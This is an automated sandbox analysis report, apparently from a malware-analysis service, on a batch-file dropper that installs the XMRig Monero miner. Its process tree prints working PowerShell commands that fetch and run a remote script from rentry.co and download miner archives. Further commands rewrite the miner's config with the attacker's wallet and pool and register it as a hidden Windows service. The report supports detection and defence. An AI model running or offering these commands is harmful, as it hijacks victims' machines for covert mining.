xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
150s
max time network
80s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
01-07-2024 03:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

31474518414234.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 16 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\moneroocean\xmrig.exe	family_xmrig
C:\Users\Admin\moneroocean\xmrig.exe	xmrig
behavioral1/memory/2912-131-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-413-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-414-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-415-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-416-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-417-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-418-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-419-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-420-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-421-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-422-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-423-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-424-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/1356-425-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

2 3808 powershell.exe
5 2712 powershell.exe
7 2564 powershell.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 9 IoCs

Processes:

xmrig.exenssm.exenssm.exenssm.exenssm.exenssm.exenssm.exenssm.exexmrig.exe

pid process

2912 xmrig.exe
2636 nssm.exe
1288 nssm.exe
3080 nssm.exe
3656 nssm.exe
3024 nssm.exe
3148 nssm.exe
2868 nssm.exe
1356 xmrig.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 raw.githubusercontent.com
5 raw.githubusercontent.com
7 raw.githubusercontent.com
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

2896 sc.exe
2740 sc.exe
4704 sc.exe
2060 sc.exe

flow	pid	process
2	3808	powershell.exe
5	2712	powershell.exe
7	2564	powershell.exe

pid	process
2912	xmrig.exe
2636	nssm.exe
1288	nssm.exe
3080	nssm.exe
3656	nssm.exe
3024	nssm.exe
3148	nssm.exe
2868	nssm.exe
1356	xmrig.exe

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
7	raw.githubusercontent.com

pid	process
2896	sc.exe
2740	sc.exe
4704	sc.exe
2060	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1956	powershell.exe
2100	powershell.exe
2564	powershell.exe
208	powershell.exe
2712	powershell.exe
4572	powershell.exe
1856	powershell.exe
3372	powershell.exe
3808	powershell.exe
1388	powershell.exe
4700	powershell.exe
636	powershell.exe
1960	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
1068	timeout.exe
1288	timeout.exe
2252	timeout.exe
3828	timeout.exe
2748	timeout.exe
3512	timeout.exe
1624	timeout.exe
4668	timeout.exe
4636	timeout.exe
4896	timeout.exe
4540	timeout.exe
1884	timeout.exe
2304	timeout.exe
1392	timeout.exe
1224	timeout.exe
1384	timeout.exe
1288	timeout.exe
4972	timeout.exe
4328	timeout.exe
3672	timeout.exe
3356	timeout.exe
1584	timeout.exe
512	timeout.exe
5108	timeout.exe
220	timeout.exe
2808	timeout.exe
1952	timeout.exe
3024	timeout.exe
4988	timeout.exe
5032	timeout.exe
5100	timeout.exe
3472	timeout.exe
1700	timeout.exe
4644	timeout.exe
4640	timeout.exe
2280	timeout.exe
2540	timeout.exe
4564	timeout.exe
4964	timeout.exe
2108	timeout.exe
1020	timeout.exe
2232	timeout.exe
2248	timeout.exe
3908	timeout.exe
1572	timeout.exe
4092	timeout.exe
4644	timeout.exe
440	timeout.exe
3044	timeout.exe
4468	timeout.exe
2588	timeout.exe
96	timeout.exe
208	timeout.exe
1828	timeout.exe
5040	timeout.exe
4648	timeout.exe
1896	timeout.exe
1972	timeout.exe
2240	timeout.exe
2276	timeout.exe
2212	timeout.exe
3060	timeout.exe
1932	timeout.exe
4364	timeout.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

316 taskkill.exe
Runs net.exe

pid	process
316	taskkill.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3808	powershell.exe
3808	powershell.exe
3808	powershell.exe
2712	powershell.exe
2712	powershell.exe
2712	powershell.exe
1956	powershell.exe
1956	powershell.exe
1956	powershell.exe
1388	powershell.exe
1388	powershell.exe
1388	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
636	powershell.exe
636	powershell.exe
636	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
1856	powershell.exe
1856	powershell.exe
1856	powershell.exe
1960	powershell.exe
1960	powershell.exe
1960	powershell.exe
2100	powershell.exe
2100	powershell.exe
2100	powershell.exe
3372	powershell.exe
3372	powershell.exe
3372	powershell.exe
2564	powershell.exe
2564	powershell.exe
2564	powershell.exe
208	powershell.exe
208	powershell.exe
208	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exexmrig.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3808	powershell.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	3372	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeLockMemoryPrivilege	1356	xmrig.exe
Token: SeIncreaseQuotaPrivilege	4456	WMIC.exe
Token: SeSecurityPrivilege	4456	WMIC.exe
Token: SeTakeOwnershipPrivilege	4456	WMIC.exe
Token: SeLoadDriverPrivilege	4456	WMIC.exe
Token: SeSystemProfilePrivilege	4456	WMIC.exe
Token: SeSystemtimePrivilege	4456	WMIC.exe
Token: SeProfSingleProcessPrivilege	4456	WMIC.exe
Token: SeIncBasePriorityPrivilege	4456	WMIC.exe
Token: SeCreatePagefilePrivilege	4456	WMIC.exe
Token: SeBackupPrivilege	4456	WMIC.exe
Token: SeRestorePrivilege	4456	WMIC.exe
Token: SeShutdownPrivilege	4456	WMIC.exe
Token: SeDebugPrivilege	4456	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4456	WMIC.exe
Token: SeRemoteShutdownPrivilege	4456	WMIC.exe
Token: SeUndockPrivilege	4456	WMIC.exe
Token: SeManageVolumePrivilege	4456	WMIC.exe
Token: 33	4456	WMIC.exe
Token: 34	4456	WMIC.exe
Token: 35	4456	WMIC.exe
Token: 36	4456	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4456	WMIC.exe
Token: SeSecurityPrivilege	4456	WMIC.exe
Token: SeTakeOwnershipPrivilege	4456	WMIC.exe
Token: SeLoadDriverPrivilege	4456	WMIC.exe
Token: SeSystemProfilePrivilege	4456	WMIC.exe
Token: SeSystemtimePrivilege	4456	WMIC.exe
Token: SeProfSingleProcessPrivilege	4456	WMIC.exe
Token: SeIncBasePriorityPrivilege	4456	WMIC.exe
Token: SeCreatePagefilePrivilege	4456	WMIC.exe
Token: SeBackupPrivilege	4456	WMIC.exe
Token: SeRestorePrivilege	4456	WMIC.exe
Token: SeShutdownPrivilege	4456	WMIC.exe
Token: SeDebugPrivilege	4456	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4456	WMIC.exe
Token: SeRemoteShutdownPrivilege	4456	WMIC.exe
Token: SeUndockPrivilege	4456	WMIC.exe
Token: SeManageVolumePrivilege	4456	WMIC.exe
Token: 33	4456	WMIC.exe
Token: 34	4456	WMIC.exe
Token: 35	4456	WMIC.exe
Token: 36	4456	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2976	WMIC.exe
Token: SeSecurityPrivilege	2976	WMIC.exe
Token: SeTakeOwnershipPrivilege	2976	WMIC.exe
Token: SeLoadDriverPrivilege	2976	WMIC.exe
Token: SeSystemProfilePrivilege	2976	WMIC.exe
Token: SeSystemtimePrivilege	2976	WMIC.exe
Token: SeProfSingleProcessPrivilege	2976	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

xmrig.exe

pid process

1356 xmrig.exe

pid	process
1356	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.execmd.exenet.execmd.exepowershell.exe

description	pid	process	target process
PID 4472 wrote to memory of 3808	4472	cmd.exe	powershell.exe
PID 4472 wrote to memory of 3808	4472	cmd.exe	powershell.exe
PID 3808 wrote to memory of 3156	3808	powershell.exe	cmd.exe
PID 3808 wrote to memory of 3156	3808	powershell.exe	cmd.exe
PID 3156 wrote to memory of 1856	3156	cmd.exe	net.exe
PID 3156 wrote to memory of 1856	3156	cmd.exe	net.exe
PID 1856 wrote to memory of 4204	1856	net.exe	net1.exe
PID 1856 wrote to memory of 4204	1856	net.exe	net1.exe
PID 3156 wrote to memory of 944	3156	cmd.exe	where.exe
PID 3156 wrote to memory of 944	3156	cmd.exe	where.exe
PID 3156 wrote to memory of 3328	3156	cmd.exe	where.exe
PID 3156 wrote to memory of 3328	3156	cmd.exe	where.exe
PID 3156 wrote to memory of 2764	3156	cmd.exe	where.exe
PID 3156 wrote to memory of 2764	3156	cmd.exe	where.exe
PID 3156 wrote to memory of 3508	3156	cmd.exe	where.exe
PID 3156 wrote to memory of 3508	3156	cmd.exe	where.exe
PID 3156 wrote to memory of 672	3156	cmd.exe	where.exe
PID 3156 wrote to memory of 672	3156	cmd.exe	where.exe
PID 3156 wrote to memory of 2896	3156	cmd.exe	sc.exe
PID 3156 wrote to memory of 2896	3156	cmd.exe	sc.exe
PID 3156 wrote to memory of 2740	3156	cmd.exe	sc.exe
PID 3156 wrote to memory of 2740	3156	cmd.exe	sc.exe
PID 3156 wrote to memory of 316	3156	cmd.exe	taskkill.exe
PID 3156 wrote to memory of 316	3156	cmd.exe	taskkill.exe
PID 3156 wrote to memory of 2712	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 2712	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 1956	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 1956	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 1388	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 1388	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 2912	3156	cmd.exe	xmrig.exe
PID 3156 wrote to memory of 2912	3156	cmd.exe	xmrig.exe
PID 3156 wrote to memory of 4132	3156	cmd.exe	cmd.exe
PID 3156 wrote to memory of 4132	3156	cmd.exe	cmd.exe
PID 4132 wrote to memory of 4700	4132	cmd.exe	powershell.exe
PID 4132 wrote to memory of 4700	4132	cmd.exe	powershell.exe
PID 4700 wrote to memory of 1052	4700	powershell.exe	HOSTNAME.EXE
PID 4700 wrote to memory of 1052	4700	powershell.exe	HOSTNAME.EXE
PID 3156 wrote to memory of 636	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 636	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 4572	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 4572	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 1856	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 1856	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 1960	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 1960	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 2100	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 2100	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 3372	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 3372	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 2564	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 2564	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 208	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 208	3156	cmd.exe	powershell.exe
PID 3156 wrote to memory of 4704	3156	cmd.exe	sc.exe
PID 3156 wrote to memory of 4704	3156	cmd.exe	sc.exe
PID 3156 wrote to memory of 2060	3156	cmd.exe	sc.exe
PID 3156 wrote to memory of 2060	3156	cmd.exe	sc.exe
PID 3156 wrote to memory of 2636	3156	cmd.exe	nssm.exe
PID 3156 wrote to memory of 2636	3156	cmd.exe	nssm.exe
PID 3156 wrote to memory of 1288	3156	cmd.exe	nssm.exe
PID 3156 wrote to memory of 1288	3156	cmd.exe	nssm.exe
PID 3156 wrote to memory of 3080	3156	cmd.exe	nssm.exe
PID 3156 wrote to memory of 3080	3156	cmd.exe	nssm.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\31474518414234.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7494.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
3⤵
- Suspicious use of WriteProcessMemory
PID:3156

C:\Windows\system32\net.exe
net session
4⤵
- Suspicious use of WriteProcessMemory
PID:1856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
5⤵
PID:4204

C:\Windows\system32\where.exe
where powershell
4⤵
PID:944

C:\Windows\system32\where.exe
where find
4⤵
PID:3328

C:\Windows\system32\where.exe
where findstr
4⤵
PID:2764

C:\Windows\system32\where.exe
where tasklist
4⤵
PID:3508

C:\Windows\system32\where.exe
where sc
4⤵
PID:672

C:\Windows\system32\sc.exe
sc stop moneroocean_miner
4⤵
- Launches sc.exe
PID:2896

C:\Windows\system32\sc.exe
sc delete moneroocean_miner
4⤵
- Launches sc.exe
PID:2740

C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe" --help
4⤵
- Executes dropped EXE
PID:2912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
4⤵
- Suspicious use of WriteProcessMemory
PID:4132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4700

C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
6⤵
PID:1052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Kzowysni\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Windows\system32\sc.exe
sc stop moneroocean_miner
4⤵
- Launches sc.exe
PID:4704

C:\Windows\system32\sc.exe
sc delete moneroocean_miner
4⤵
- Launches sc.exe
PID:2060

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
4⤵
- Executes dropped EXE
PID:2636

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
4⤵
- Executes dropped EXE
PID:1288

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
4⤵
- Executes dropped EXE
PID:3080

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
4⤵
- Executes dropped EXE
PID:3656

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
4⤵
- Executes dropped EXE
PID:3024

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
4⤵
- Executes dropped EXE
PID:3148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1324

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4456

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3512

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1068

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4944

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4968

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5048

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4988

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3820

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4876

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2620

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1620

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5008

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4452

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4212

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3552

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2212

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:760

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4976

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4972

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1016

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:96

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4692

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:196

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2532

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4280

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3360

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3880

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3672

C:\Windows\system32\cmd.exe
